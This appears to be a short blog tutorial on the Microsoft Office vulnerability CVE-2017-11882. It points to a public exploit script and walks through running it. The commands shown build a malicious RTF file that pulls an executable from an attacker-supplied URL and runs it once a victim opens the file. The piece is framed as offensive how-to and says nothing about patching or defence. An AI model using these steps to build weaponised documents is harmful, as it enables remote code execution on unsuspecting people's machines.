A 17 year old Vulnerability in Microsoft Word was disclosed recently tracked by CVE-2017-11882 which affected the major versions of Microsoft Office – Microsoft Office 2007 SP 3, Microsoft Office 2010 SP 2, Microsoft Office 2013 SP 1, and Microsoft Office 2016. This vulnerability allows attackers to run remote codes with the privileges of the current user due to the flaw in handling objects in the memory which is otherwise known as “Microsoft Office Memory Corruption Vulnerability”. You can download the white paper by clicking the link below.
Exploit for this vulnerability has been released by ‘Embedi’ and is available for download in their github page.
Start a Terminal and perform an update and an upgrade by executing the command
sudo apt update sudo apt upgrade
The code is available for download, click the below link to download
Go inside the directory and you will find a file named “webdav_exec_CVE-2017-11882.py”. This is the file that we will be using to create the exploit rtf file. Now you can execute the command
python webdav_exec_CVE-2017-11882.py -h
To create the payload execute the command
python webdav_exec_CVE-2017-11882.py -u <URL> -e <executable_file> -o <output_name> When this file is opened in the victims machine, the executable file will start to run.